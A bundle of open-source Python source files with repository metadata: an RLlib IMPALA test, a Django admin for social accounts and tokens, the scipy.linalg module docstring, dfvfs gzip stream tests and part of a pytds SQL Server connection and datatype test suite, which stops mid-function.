print(trainer.train())
check_compute_single_action(
trainer,
include_state=True,
include_prev_action_reward=True)
trainer.stop()
def test_impala_lr_schedule(self):
config = impala.DEFAULT_CONFIG.copy()
config["lr_schedule"] = [
[0, 0.0005],
[10000, 0.000001],
]
local_cfg = config.copy()
trainer = impala.ImpalaTrainer(config=local_cfg, env="CartPole-v0")
def get_lr(result):
return result["info"]["learner"]["default_policy"]["cur_lr"]
try:
r1 = trainer.train()
r2 = trainer.train()
assert get_lr(r2) < get_lr(r1), (r1, r2)
finally:
trainer.stop()
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", __file__]))
| {
"content_hash": "1c3792eafa8dcfbe0c738791b665c4ab",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 78,
"avg_line_length": 33.166666666666664,
"alnum_prop": 0.534209509083881,
"repo_name": "richardliaw/ray",
"id": "a9697c50bb096e564d85c7e2e97b4930bf8da6f5",
"size": "2587",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rllib/agents/impala/tests/test_impala.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "62178"
},
{
"name": "C++",
"bytes": "4258483"
},
{
"name": "CSS",
"bytes": "8025"
},
{
"name": "Dockerfile",
"bytes": "6292"
},
{
"name": "HTML",
"bytes": "30414"
},
{
"name": "Java",
"bytes": "1263157"
},
{
"name": "JavaScript",
"bytes": "444"
},
{
"name": "Jupyter Notebook",
"bytes": "1615"
},
{
"name": "Makefile",
"bytes": "234"
},
{
"name": "Python",
"bytes": "7515224"
},
{
"name": "Shell",
"bytes": "117425"
},
{
"name": "Starlark",
"bytes": "200955"
},
{
"name": "TypeScript",
"bytes": "149068"
}
],
"symlink_target": ""
} |
from django.contrib import admin
from .models import SocialAccount, SocialToken
class SocialAccountAdmin(admin.ModelAdmin):
search_fields = ('user__username', )
raw_id_fields = ('user',)
list_display = ('user', 'uid', 'provider')
list_filter = ('provider',)
class SocialTokenAdmin(admin.ModelAdmin):
raw_id_fields = ('account',)
list_display = ('account', 'truncated_token', 'expires_at', 'token_secret')
list_filter = ('expires_at',)
def truncated_token(self, token):
max_chars = 40
ret = token.token
if len(ret) > max_chars:
ret = ret[0:max_chars] + '...(truncated)'
return ret
truncated_token.short_description = 'Token'
admin.site.register(SocialToken, SocialTokenAdmin)
admin.site.register(SocialAccount, SocialAccountAdmin)
| {
"content_hash": "580b2168cecf732635c0855c0508c59b",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 80,
"avg_line_length": 31.46153846153846,
"alnum_prop": 0.6589242053789731,
"repo_name": "houssemFat/bloodOn",
"id": "ffcf0eaffba3f63d1714bb1b22de55fcfa793ed0",
"size": "818",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bloodon/accounts/social/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "19573"
},
{
"name": "HTML",
"bytes": "88555"
},
{
"name": "JavaScript",
"bytes": "235084"
},
{
"name": "Python",
"bytes": "191595"
}
],
"symlink_target": ""
} |
"""
====================================
Linear algebra (:mod:`scipy.linalg`)
====================================
.. currentmodule:: scipy.linalg
Linear algebra functions.
.. seealso::
`numpy.linalg` for more linear algebra functions. Note that
although `scipy.linalg` imports most of them, identically named
functions from `scipy.linalg` may offer more or slightly differing
functionality.
Basics
======
.. autosummary::
:toctree: generated/
inv - Find the inverse of a square matrix
solve - Solve a linear system of equations
solve_banded - Solve a banded linear system
solveh_banded - Solve a Hermitian or symmetric banded system
solve_circulant - Solve a circulant system
solve_triangular - Solve a triangular matrix
solve_toeplitz - Solve a toeplitz matrix
det - Find the determinant of a square matrix
norm - Matrix and vector norm
lstsq - Solve a linear least-squares problem
pinv - Pseudo-inverse (Moore-Penrose) using lstsq
pinv2 - Pseudo-inverse using svd
pinvh - Pseudo-inverse of hermitian matrix
kron - Kronecker product of two arrays
tril - Construct a lower-triangular matrix from a given matrix
triu - Construct an upper-triangular matrix from a given matrix
orthogonal_procrustes - Solve an orthogonal Procrustes problem
matrix_balance - Balance matrix entries with a similarity transformation
LinAlgError
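For example, a minimal sketch of the basic solver (illustrative values)::
import numpy as np
from scipy import linalg
a = np.array([[3., 2.], [1., 4.]])
b = np.array([5., 6.])
x = linalg.solve(a, b)  # x == array([0.8, 1.3]), so that a.dot(x) == b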
Eigenvalue Problems
===================
.. autosummary::
:toctree: generated/
eig - Find the eigenvalues and eigenvectors of a square matrix
eigvals - Find just the eigenvalues of a square matrix
eigh - Find the e-vals and e-vectors of a Hermitian or symmetric matrix
eigvalsh - Find just the eigenvalues of a Hermitian or symmetric matrix
eig_banded - Find the eigenvalues and eigenvectors of a banded matrix
eigvals_banded - Find just the eigenvalues of a banded matrix
Decompositions
==============
.. autosummary::
:toctree: generated/
lu - LU decomposition of a matrix
lu_factor - LU decomposition returning unordered matrix and pivots
lu_solve - Solve Ax=b using back substitution with output of lu_factor
svd - Singular value decomposition of a matrix
svdvals - Singular values of a matrix
diagsvd - Construct matrix of singular values from output of svd
orth - Construct orthonormal basis for the range of A using svd
cholesky - Cholesky decomposition of a matrix
cholesky_banded - Cholesky decomp. of a sym. or Hermitian banded matrix
cho_factor - Cholesky decomposition for use in solving a linear system
cho_solve - Solve previously factored linear system
cho_solve_banded - Solve previously factored banded linear system
polar - Compute the polar decomposition.
qr - QR decomposition of a matrix
qr_multiply - QR decomposition and multiplication by Q
qr_update - Rank k QR update
qr_delete - QR downdate on row or column deletion
qr_insert - QR update on row or column insertion
rq - RQ decomposition of a matrix
qz - QZ decomposition of a pair of matrices
ordqz - QZ decomposition of a pair of matrices with reordering
schur - Schur decomposition of a matrix
rsf2csf - Real to complex Schur form
hessenberg - Hessenberg form of a matrix
.. seealso::
`scipy.linalg.interpolative` -- Interpolative matrix decompositions
Matrix Functions
================
.. autosummary::
:toctree: generated/
expm - Matrix exponential
logm - Matrix logarithm
cosm - Matrix cosine
sinm - Matrix sine
tanm - Matrix tangent
coshm - Matrix hyperbolic cosine
sinhm - Matrix hyperbolic sine
tanhm - Matrix hyperbolic tangent
signm - Matrix sign
sqrtm - Matrix square root
funm - Evaluating an arbitrary matrix function
expm_frechet - Frechet derivative of the matrix exponential
expm_cond - Relative condition number of expm in the Frobenius norm
fractional_matrix_power - Fractional matrix power
Matrix Equation Solvers
=======================
.. autosummary::
:toctree: generated/
solve_sylvester - Solve the Sylvester matrix equation
solve_continuous_are - Solve the continuous-time algebraic Riccati equation
solve_discrete_are - Solve the discrete-time algebraic Riccati equation
solve_continuous_lyapunov - Solve the continuous-time Lyapunov equation
solve_discrete_lyapunov - Solve the discrete-time Lyapunov equation
Special Matrices
================
.. autosummary::
:toctree: generated/
block_diag - Construct a block diagonal matrix from submatrices
circulant - Circulant matrix
companion - Companion matrix
dft - Discrete Fourier transform matrix
hadamard - Hadamard matrix of order 2**n
hankel - Hankel matrix
helmert - Helmert matrix
hilbert - Hilbert matrix
invhilbert - Inverse Hilbert matrix
leslie - Leslie matrix
pascal - Pascal matrix
invpascal - Inverse Pascal matrix
toeplitz - Toeplitz matrix
tri - Construct a matrix filled with ones at and below a given diagonal
Low-level routines
==================
.. autosummary::
:toctree: generated/
get_blas_funcs
get_lapack_funcs
find_best_blas_type
.. seealso::
`scipy.linalg.blas` -- Low-level BLAS functions
`scipy.linalg.lapack` -- Low-level LAPACK functions
`scipy.linalg.cython_blas` -- Low-level BLAS functions for Cython
`scipy.linalg.cython_lapack` -- Low-level LAPACK functions for Cython
"""
from __future__ import division, print_function, absolute_import
from .linalg_version import linalg_version as __version__
from .misc import *
from .basic import *
from .decomp import *
from .decomp_lu import *
from .decomp_cholesky import *
from .decomp_qr import *
from ._decomp_qz import *
from .decomp_svd import *
from .decomp_schur import *
from ._decomp_polar import *
from .matfuncs import *
from .blas import *
from .lapack import *
from .special_matrices import *
from ._solvers import *
from ._procrustes import *
from ._decomp_update import *
__all__ = [s for s in dir() if not s.startswith('_')]
from numpy.dual import register_func
for k in ['norm', 'inv', 'svd', 'solve', 'det', 'eig', 'eigh', 'eigvals',
'eigvalsh', 'lstsq', 'cholesky']:
try:
register_func(k, eval(k))
except ValueError:
pass
try:
register_func('pinv', pinv2)
except ValueError:
pass
del k, register_func
from numpy.testing import Tester
test = Tester().test
| {
"content_hash": "8c3fce868892fdc2c39afb92ee85dc3a",
"timestamp": "",
"source": "github",
"line_count": 211,
"max_line_length": 78,
"avg_line_length": 30.393364928909953,
"alnum_prop": 0.7140184001247466,
"repo_name": "befelix/scipy",
"id": "35d2505d0c46c7cd6e260c106b62c8cde860e03c",
"size": "6413",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "scipy/linalg/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4126152"
},
{
"name": "C++",
"bytes": "507246"
},
{
"name": "Fortran",
"bytes": "5572451"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Matlab",
"bytes": "4346"
},
{
"name": "Python",
"bytes": "11531518"
},
{
"name": "Shell",
"bytes": "2226"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
} |
"""Tests for gzip compressed stream file."""
# Note: do not rename file to gzip.py this can cause the exception:
# AttributeError: 'module' object has no attribute 'GzipFile'
# when using pip.
import os
import unittest
from dfvfs.lib import definitions
from dfvfs.lib import gzipfile
from dfvfs.path import factory as path_spec_factory
from dfvfs.resolver import resolver
from tests import test_lib as shared_test_lib
# TODO: add tests for _GzipDecompressorState
# TODO: add tests for GzipMember
class GzipCompressedStreamTest(shared_test_lib.BaseTestCase):
"""Tests a gzip compressed stream file-like object."""
def testOpenClose(self):
"""Test the Open and Close functions."""
test_path = self._GetTestFilePath(['syslog.gz'])
self._SkipIfPathNotExists(test_path)
test_file = gzipfile.GzipCompressedStream()
test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_OS, location=test_path)
file_object = resolver.Resolver.OpenFileObject(test_os_path_spec)
test_file.Open(file_object)
try:
self.assertEqual(len(test_file.members), 1)
finally:
test_file.close()
def testSeek(self):
"""Test the seek functionality."""
test_path = self._GetTestFilePath(['syslog.gz'])
self._SkipIfPathNotExists(test_path)
test_file = gzipfile.GzipCompressedStream()
test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_OS, location=test_path)
file_object = resolver.Resolver.OpenFileObject(test_os_path_spec)
test_file.Open(file_object)
try:
test_file.seek(177)
self.assertEqual(test_file.read(5), b'53:01')
self.assertEqual(test_file.get_offset(), 182)
test_file.seek(-10, os.SEEK_END)
self.assertEqual(test_file.read(5), b'times')
test_file.seek(2, os.SEEK_CUR)
self.assertEqual(test_file.read(2), b'--')
# Conforming to POSIX, the seek offset can exceed the file size,
# but reading past the end returns no data.
test_file.seek(2000, os.SEEK_SET)
self.assertEqual(test_file.get_offset(), 2000)
self.assertEqual(test_file.read(2), b'')
# Test with an invalid offset.
with self.assertRaises(IOError):
test_file.seek(-10, os.SEEK_SET)
# On error the offset should not change.
self.assertEqual(test_file.get_offset(), 2000)
# Test with an invalid whence.
with self.assertRaises(IOError):
test_file.seek(10, 5)
# On error the offset should not change.
self.assertEqual(test_file.get_offset(), 2000)
finally:
test_file.close()
def testRead(self):
"""Test the read functionality."""
test_path = self._GetTestFilePath(['syslog.gz'])
self._SkipIfPathNotExists(test_path)
test_file = gzipfile.GzipCompressedStream()
test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_OS, location=test_path)
file_object = resolver.Resolver.OpenFileObject(test_os_path_spec)
test_file.Open(file_object)
try:
test_file.seek(167, os.SEEK_SET)
self.assertEqual(test_file.get_offset(), 167)
expected_data = (
b'Jan 22 07:53:01 myhostname.myhost.com CRON[31051]: (root) CMD '
b'(touch /var/run/crond.somecheck)\n')
data = test_file.read(95)
self.assertEqual(data, expected_data)
self.assertEqual(test_file.get_offset(), 262)
finally:
test_file.close()
def testReadCorrupt(self):
"""Tests reading a file that is corrupt."""
# The corrupt gzip has no member footer.
test_path = self._GetTestFilePath(['corrupt1.gz'])
self._SkipIfPathNotExists(test_path)
test_file = gzipfile.GzipCompressedStream()
test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_OS, location=test_path)
file_object = resolver.Resolver.OpenFileObject(test_os_path_spec)
test_file.Open(file_object)
try:
self.assertEqual(test_file.uncompressed_data_size, 2994187)
finally:
test_file.close()
def testReadMultipleMembers(self):
"""Tests reading a file that contains multiple gzip members."""
test_path = self._GetTestFilePath(['fsevents_000000000000b208'])
self._SkipIfPathNotExists(test_path)
test_file = gzipfile.GzipCompressedStream()
test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_OS, location=test_path)
file_object = resolver.Resolver.OpenFileObject(test_os_path_spec)
test_file.Open(file_object)
try:
self.assertEqual(len(test_file.members), 2)
file_start = test_file.read(4)
self.assertEqual(file_start, b'1SLD')
# Read the end of the second member
test_file.seek(506631 - 4)
file_end = test_file.read(4)
self.assertEqual(file_end, b'\x02\x00\x80\x00')
# Seek backwards, and read across a member boundary.
test_file.seek(28530)
self.assertEqual(test_file.read(6), b'OS\x00P\x07\x00')
# Read with a size greater than the file size.
test_file.seek(0)
data = test_file.read(size=506631 + 4)
self.assertEqual(len(data), 506631)
self.assertEqual(data[-4:], b'\x02\x00\x80\x00')
finally:
test_file.close()
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "e7131c8157c0fbda94bfbaf7b4dea529",
"timestamp": "",
"source": "github",
"line_count": 181,
"max_line_length": 75,
"avg_line_length": 29.635359116022098,
"alnum_prop": 0.6793437733035048,
"repo_name": "joachimmetz/dfvfs",
"id": "d3649f5019a65ae81fec7855e341a3e8640abf07",
"size": "5410",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "tests/lib/gzipfile.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "14212"
},
{
"name": "Makefile",
"bytes": "122"
},
{
"name": "PowerShell",
"bytes": "1021"
},
{
"name": "Python",
"bytes": "2176548"
},
{
"name": "Shell",
"bytes": "19355"
}
],
"symlink_target": ""
} |
from __future__ import with_statement
from __future__ import unicode_literals
import os
import random
import string
import codecs
from six import StringIO, BytesIO
import logging
import socket
from pytds.tds_types import TimeType, DateTime2Type, DateType, DateTimeOffsetType, BitType, TinyIntType, SmallIntType, \
IntType, BigIntType, RealType, FloatType, NVarCharType, VarBinaryType, SmallDateTimeType, DateTimeType, DecimalType, \
MoneyType, UniqueIdentifierType, VariantType, ImageType, VarBinaryMaxType, VarCharType, TextType, NTextType, \
NVarCharMaxType, VarCharMaxType, XmlType
try:
import unittest2 as unittest
except:
import unittest
import sys
from decimal import Decimal, getcontext
import logging
from time import sleep
from datetime import datetime, date, time
import uuid
import pytest
import pytds.tz
import pytds.login
import pytds.smp
tzoffset = pytds.tz.FixedOffsetTimezone
utc = pytds.tz.utc
import pytds.extensions
import six
from six.moves import xrange
from pytds import (
connect, ProgrammingError, TimeoutError, Time,
Error, IntegrityError, Timestamp, DataError, Date, Binary,
output, default,
STRING, BINARY, NUMBER, DATETIME, DECIMAL, INTEGER, REAL, XML)
from pytds.tds_types import (DateTimeSerializer, SmallMoneyType)
from pytds.tds_base import (
Column,
IS_TDS73_PLUS, IS_TDS71_PLUS,
)
import dbapi20
import pytds
import settings
logger = logging.getLogger(__name__)
LIVE_TEST = getattr(settings, 'LIVE_TEST', True)
def create_test_database():
if not LIVE_TEST:
return
logger.info('in setup class')
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['autocommit'] = True
with connect(**kwargs) as conn:
with conn.cursor() as cur:
try:
cur.execute('drop database [{0}]'.format(settings.DATABASE))
except:
logger.exception('Failed to drop database')
pass
try:
cur.execute('create database [{0}]'.format(settings.DATABASE))
except:
pass
try:
cur.execute('create schema myschema')
except:
pass
try:
cur.execute('create table myschema.bulk_insert_table(num int, data varchar(100))')
except:
pass
try:
cur.execute('''
create procedure testproc (@param int, @add int = 2, @outparam int output)
as
begin
set nocount on
--select @param
set @outparam = @param + @add
return @outparam
end
''')
except:
pass
create_test_database()
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
def test_connection_timeout_with_mars():
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['timeout'] = 1
kwargs['use_mars'] = True
with connect(*settings.CONNECT_ARGS, **kwargs) as conn:
cur = conn.cursor()
with pytest.raises(TimeoutError):
cur.execute("waitfor delay '00:00:05'")
cur.execute('select 1')
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
def test_connection_no_mars_autocommit():
kwargs = settings.CONNECT_KWARGS.copy()
kwargs.update({
'use_mars': False,
'timeout': 1,
'pooling': True,
'autocommit': True,
})
with connect(**kwargs) as conn:
with conn.cursor() as cur:
# test execute scalar with empty response
cur.execute_scalar('declare @tbl table(f int); select * from @tbl')
cur.execute("print 'hello'")
messages = cur.messages
assert len(messages) == 1
assert len(messages[0]) == 2
# in the following assert the exception class does not have to match exactly
assert messages[0][0] == pytds.OperationalError
assert messages[0][1].text == 'hello'
assert messages[0][1].line == 1
assert messages[0][1].severity == 0
assert messages[0][1].number == 0
assert messages[0][1].state == 1
assert 'hello' in messages[0][1].message
# test cursor usage after close, should raise exception
cur = conn.cursor()
cur.execute_scalar('select 1')
cur.close()
with pytest.raises(Error) as ex:
cur.execute('select 1')
assert 'Cursor is closed' in str(ex)
# calling get_proc_return_status on closed cursor works
# this test does not have to pass
assert cur.get_proc_return_status() is None
# calling rowcount on closed cursor works
# this test does not have to pass
assert cur.rowcount == -1
# calling description on closed cursor works
# this test does not have to pass
assert cur.description is None
# calling messages on closed cursor works
# this test does not have to pass
assert cur.messages is None
# calling description on closed cursor works
# this test does not have to pass
assert cur.native_description is None
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
def test_connection_timeout_no_mars():
kwargs = settings.CONNECT_KWARGS.copy()
kwargs.update({
'use_mars': False,
'timeout': 1,
'pooling': True,
})
with connect(**kwargs) as conn:
with conn.cursor() as cur:
with pytest.raises(TimeoutError):
cur.execute("waitfor delay '00:00:05'")
with conn.cursor() as cur:
cur.execute("select 1")
cur.fetchall()
# test cancelling
with conn.cursor() as cur:
cur.execute('select 1')
cur.cancel()
assert cur.fetchall() == []
cur.execute('select 2')
assert cur.fetchall() == [(2,)]
# test rollback
conn.rollback()
# test callproc on non-mars connection
with conn.cursor() as cur:
cur.callproc('sp_reset_connection')
with conn.cursor() as cur:
# test spid property on non-mars cursor
assert cur.spid is not None
# test tzinfo_factory property r/w
cur.tzinfo_factory = cur.tzinfo_factory
# test non-mars cursor with connection pool enabled
with connect(**kwargs) as conn:
with conn.cursor() as cur:
cur.execute('select 1')
assert cur.fetchall() == [(1,)]
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
def test_connection_no_mars_no_pooling():
kwargs = settings.CONNECT_KWARGS.copy()
kwargs.update({
'use_mars': False,
'pooling': False,
})
with connect(**kwargs) as conn:
with conn.cursor() as cur:
cur.execute("select 1")
assert cur.fetchall() == [(1,)]
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
def test_row_strategies():
kwargs = settings.CONNECT_KWARGS.copy()
kwargs.update({
'row_strategy': pytds.list_row_strategy,
})
with connect(**kwargs) as conn:
with conn.cursor() as cur:
cur.execute("select 1")
assert cur.fetchall() == [[1]]
kwargs.update({
'row_strategy': pytds.namedtuple_row_strategy,
})
import collections
with connect(**kwargs) as conn:
with conn.cursor() as cur:
cur.execute("select 1 as f")
assert cur.fetchall() == [collections.namedtuple('Row', ['f'])(1)]
kwargs.update({
'row_strategy': pytds.recordtype_row_strategy,
})
with connect(**kwargs) as conn:
with conn.cursor() as cur:
cur.execute("select 1 as e, 2 as f")
row, = cur.fetchall()
assert row.e == 1
assert row.f == 2
assert row[0] == 1
assert row[:] == (1, 2)
row[0] = 3
assert row[:] == (3, 2)
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
def test_get_instances():
if not hasattr(settings, 'BROWSER_ADDRESS'):
raise unittest.SkipTest('BROWSER_ADDRESS setting is not defined')
pytds.tds.tds7_get_instances(settings.BROWSER_ADDRESS)
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class ConnectionTestCase(unittest.TestCase):
def setUp(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
self.conn = connect(*settings.CONNECT_ARGS, **kwargs)
def tearDown(self):
self.conn.close()
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class NoMarsTestCase(unittest.TestCase):
def setUp(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['use_mars'] = False
self.conn = connect(*settings.CONNECT_ARGS, **kwargs)
def tearDown(self):
self.conn.close()
def test_commit(self):
cursor = self.conn.cursor()
cursor.execute('select 1')
cursor.fetchall()
self.conn.commit()
class TestCaseWithCursor(ConnectionTestCase):
def setUp(self):
super(TestCaseWithCursor, self).setUp()
self.cursor = self.conn.cursor()
#def test_mars_sessions_recycle_ids(self):
# if not self.conn.mars_enabled:
# self.skipTest('Only relevant to mars')
# for _ in xrange(2 ** 16 + 1):
# cur = self.conn.cursor()
# cur.close()
def test_parameters_ll(self):
_params_tests(self)
class TestVariant(ConnectionTestCase):
def _t(self, result, sql):
with self.conn.cursor() as cur:
cur.execute("select cast({0} as sql_variant)".format(sql))
val, = cur.fetchone()
self.assertEqual(result, val)
def test_new_datetime(self):
if not IS_TDS73_PLUS(self.conn):
self.skipTest('Requires TDS7.3+')
import pytds.tz
self._t(datetime(2011, 2, 3, 10, 11, 12, 3000), "cast('2011-02-03T10:11:12.003000' as datetime2)")
self._t(time(10, 11, 12, 3000), "cast('10:11:12.003000' as time)")
self._t(date(2011, 2, 3), "cast('2011-02-03' as date)")
self._t(datetime(2011, 2, 3, 10, 11, 12, 3000, pytds.tz.FixedOffsetTimezone(3 * 60)), "cast('2011-02-03T10:11:12.003000+03:00' as datetimeoffset)")
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class BadConnection(unittest.TestCase):
def test_invalid_parameters(self):
with self.assertRaises(Error):
with connect(server=settings.HOST + 'bad', database='master', user='baduser', password=settings.PASSWORD, login_timeout=1) as conn:
with conn.cursor() as cur:
cur.execute('select 1')
with self.assertRaises(Error):
with connect(server=settings.HOST, database='doesnotexist', user=settings.USER, password=settings.PASSWORD) as conn:
with conn.cursor() as cur:
cur.execute('select 1')
with self.assertRaises(Error):
with connect(server=settings.HOST, database='master', user='baduser', password=None) as conn:
with conn.cursor() as cur:
cur.execute('select 1')
def test_instance_and_port(self):
host = settings.HOST
if '\\' in host:
host, _ = host.split('\\')
with self.assertRaisesRegexp(ValueError, 'Both instance and port shouldn\'t be specified'):
with connect(server=host + '\\badinstancename', database='master', user=settings.USER, password=settings.PASSWORD, port=1212) as conn:
with conn.cursor() as cur:
cur.execute('select 1')
def get_spid(conn):
with conn.cursor() as cur:
return cur.spid
def kill(conn, spid):
with conn.cursor() as cur:
cur.execute('kill {0}'.format(spid))
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class ConnectionClosing(unittest.TestCase):
def test_open_close(self):
for x in xrange(3):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
connect(**kwargs).close()
def test_closing_after_closed_by_server(self):
"""
You should be able to call close on connection closed by server
"""
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
kwargs['autocommit'] = True
with connect(**kwargs) as master_conn:
kwargs['autocommit'] = False
with connect(**kwargs) as conn:
with conn.cursor() as cur:
cur.execute('select 1')
conn.commit()
kill(master_conn, get_spid(conn))
sleep(0.2)
conn.close()
def test_connection_closed_by_server(self):
kwargs = settings.CONNECT_KWARGS.copy()
kwargs['database'] = 'master'
with connect(**kwargs) as master_conn:
master_conn.autocommit = True
with connect(**kwargs) as conn:
conn.autocommit = False
# test overall recovery
with conn.cursor() as cur:
cur.execute('select 1')
conn.commit()
kill(master_conn, get_spid(conn))
sleep(0.2)
cur.execute('select 1')
cur.fetchall()
kill(master_conn, get_spid(conn))
sleep(0.2)
with conn.cursor() as cur:
cur.execute('select 1')
# test cursor opening in a transaction, it should raise exception
# make transaction dirty
with conn.cursor() as cur:
cur.execute('select 1')
kill(master_conn, get_spid(conn))
sleep(0.2)
# it does not have to raise this specific exception
with pytest.raises(socket.error):
with conn.cursor() as cur:
cur.execute('select 1')
# test recovery on transaction
with conn.cursor() as cur:
cur.execute('create table ##testtable3 (fld int)')
kill(master_conn, get_spid(conn))
sleep(0.2)
with self.assertRaises(Exception):
cur.execute('select * from ##testtable2')
cur.fetchall()
conn.rollback()
cur.execute('select 1')
# test server closed connection on rollback
with conn.cursor() as cur:
cur.execute('select 1')
kill(master_conn, get_spid(conn))
sleep(0.2)
conn.rollback()
#with connect(server=settings.HOST, database='master', user=settings.USER, password=settings.PASSWORD) as conn:
# spid = get_spid(conn)
# with conn.cursor() as cur:
# # test recovery of specific lowlevel methods
# tds_submit_query(cur._session, "waitfor delay '00:00:05'; select 1")
# kill(master_conn, spid)
# self.assertTrue(cur._session.is_connected())
# with self.assertRaises(Exception):
# tds_process_tokens(cur._session, TDS_TOKEN_RESULTS)
# self.assertFalse(cur._session.is_connected())
#class EncryptionTest(unittest.TestCase):
# def runTest(self):
# conn = connect(server=settings.HOST, database='master', user=settings.USER, password=settings.PASSWORD, encryption_level=TDS_ENCRYPTION_REQUIRE)
# cur = conn.cursor()
# cur.execute('select 1')
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class SmallDateTimeTest(ConnectionTestCase):
def _testval(self, val):
with self.conn.cursor() as cur:
cur.execute('select cast(%s as smalldatetime)', (val,))
self.assertEqual(cur.fetchall(), [(val,)])
def runTest(self):
self._testval(Timestamp(2010, 2, 1, 10, 12, 0))
self._testval(Timestamp(1900, 1, 1, 0, 0, 0))
self._testval(Timestamp(2079, 6, 6, 23, 59, 0))
with self.assertRaises(Error):
self._testval(Timestamp(1899, 1, 1, 0, 0, 0))
with self.assertRaises(Error):
self._testval(Timestamp(2080, 1, 1, 0, 0, 0))
@unittest.skipUnless(LIVE_TEST, "requires HOST variable to be set")
class DateTimeTest(ConnectionTestCase):
def _testencdec(self, val):
self.assertEqual(val, DateTimeSerializer.decode(*DateTimeSerializer._struct.unpack(DateTimeSerializer.encode(val))))
def _testval(self, val):
with self.conn.cursor() as cur:
cur.execute('select cast(%s as datetime)', (val,))
self.assertEqual(cur.fetchall(), [(val,)])
def runTest(self):
with self.conn.cursor() as cur:
cur.execute("select cast('9999-12-31T23:59:59.997' as datetime)")
self.assertEqual(cur.fetchall(), [(Timestamp(9999, 12, 31, 23, 59, 59, 997000),)])
self._testencdec(Timestamp(2010, 1, 2, 10, 11, 12))
self._testval(Timestamp(2010, 1, 2, 0, 0, 0))
self._testval(Timestamp(2010, 1, 2, 10, 11, 12))
self._testval(Timestamp(1753, 1, 1, 0, 0, 0))
self._testval(Timestamp(9999, 12, 31, 0, 0, 0))
with self.conn.cursor() as cur:
cur.execute("select cast(null as datetime)")
self.assertEqual(cur.fetchall(), [(None,)])
self._testval(Timestamp(9999, 12, 31, 23, 59, 59, 997000))
with self.assertRaises(Error):
self._testval(Timestamp(1752, 1, 1, 0, 0, 0))
with self.conn.cursor() as cur:
cur.execute('''
if object_id('testtable') is not null
drop table testtable
''')
cur.execute('create table testtable (col datetime not null)')
dt = Timestamp(2010, 1, 2, 20, 21, 22, 123000)
cur.execute('insert into testtable values (%s)', (dt,))
cur.execute('select col from testtable')
self.assertEqual(cur.fetchone(), (dt,))
class NewDateTimeTest(ConnectionTestCase):
def test_datetimeoffset(self):
if not IS_TDS73_PLUS(self.conn):
self.skipTest('Requires TDS7.3+')
def _testval(val):
with self.conn.cursor() as cur:
import pytds.tz
cur.tzinfo_factory = pytds.tz.FixedOffsetTimezone
cur.execute('select cast(%s as datetimeoffset)', (val,))
self.assertEqual(cur.fetchall(), [(val,)])
with self.conn.cursor() as cur:
import pytds.tz
cur.tzinfo_factory = pytds.tz.FixedOffsetTimezone
cur.execute("select cast('2010-01-02T20:21:22.1234567+05:00' as datetimeoffset)")
self.assertEqual(datetime(2010, 1, 2, 20, 21, 22, 123456, tzoffset(5 * 60)), cur.fetchone()[0])
_testval(Timestamp(2010, 1, 2, 0, 0, 0, 0, utc))
_testval(Timestamp(2010, 1, 2, 0, 0, 0, 0, tzoffset(5 * 60)))
_testval(Timestamp(1, 1, 1, 0, 0, 0, 0, utc))
_testval(Timestamp(9999, 12, 31, 23, 59, 59, 999999, utc))
_testval(Timestamp(2010, 1, 2, 0, 0, 0, 0, tzoffset(14)))
_testval(Timestamp(2010, 1, 2, 0, 0, 0, 0, tzoffset(-14)))
_testval(Timestamp(2010, 1, 2, 0, 0, 0, 0, tzoffset(-15)))
def test_time(self):
if not IS_TDS73_PLUS(self.conn):
self.skipTest('Requires TDS7.3+')
def testval(val):
with self.conn.cursor() as cur:
cur.execute('select cast(%s as time)', (val,))
self.assertEqual(cur.fetchall(), [(val,)])
testval(Time(14, 16, 18, 123456))
testval(Time(0, 0, 0, 0))
testval(Time(0, 0, 0, 0))
testval(Time(0, 0, 0, 0))
testval(Time(23, 59, 59, 999999))
testval(Time(0, 0, 0, 0))
testval(Time(0, 0, 0, 0))
testval(Time(0, 0, 0, 0))
def test_datetime2(self):
if not IS_TDS73_PLUS(self.conn):
self.skipTest('Requires TDS7.3+')
def testval(val):
with self.conn.cursor() as cur:
cur.execute('select cast(%s as datetime2)', (val,))
